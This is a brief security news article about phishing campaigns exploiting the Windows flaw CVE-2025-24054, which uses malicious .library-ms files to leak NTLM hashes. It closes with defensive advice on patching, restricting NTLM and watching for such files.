Exploitation of Windows Vulnerability Puts NTLM Hashes at Risk

A recently patched Windows vulnerability, CVE-2025-24054, is now actively exploited in phishing attacks targeting government and private organizations to steal authenticating NTLM hashes.

Bill Toulas reports in BleepingComputer that the flaw, initially deemed unlikely to be exploited, was addressed in Microsoft’s March 2025 Patch.

However, within days, researchers at cybersecurity software firm Check Point identified active exploitation campaigns using the vulnerability to extract NTLM authentication hashes with minimal user interaction.

The attack vector involves phishing emails distributing malicious .library-ms files, either directly or within ZIP archives, linked to attacker-controlled SMB servers.

These .library-ms files, when interacted with even passively in Windows Explorer, trigger the operating system to authenticate with the remote server using the NTLM protocol. This results in the unintentional transmission of NTLM hashes, which attackers can capture and potentially crack for unauthorized access.

Although attribution is inconclusive, one IP address used in the campaign has past associations with the Russian state-backed group APT28.

Check Point’s analysis revealed that these phishing campaigns intensified from March 20 to 25, initially targeting entities in Poland and Romania, and later expanding globally.

The .library-ms method was supplemented by additional files that exploited older NTLM vulnerabilities, making the campaign more reliable.

Microsoft confirmed that the exploit requires minimal interaction to be triggered, such as right-clicking a malicious file, which increases the threat level despite its “medium” severity rating.

Firms handling sensitive client data should treat this threat as high-risk. Immediate steps should include applying Microsoft’s March 2025 updates, auditing systems for NTLM usage, and disabling it where feasible.

Security teams should monitor for .library-ms activity and educate staff on how to identify suspicious attachments. Given the low barrier to exploitation, proactive defense is critical for mitigating privilege escalation and authentication bypass risks.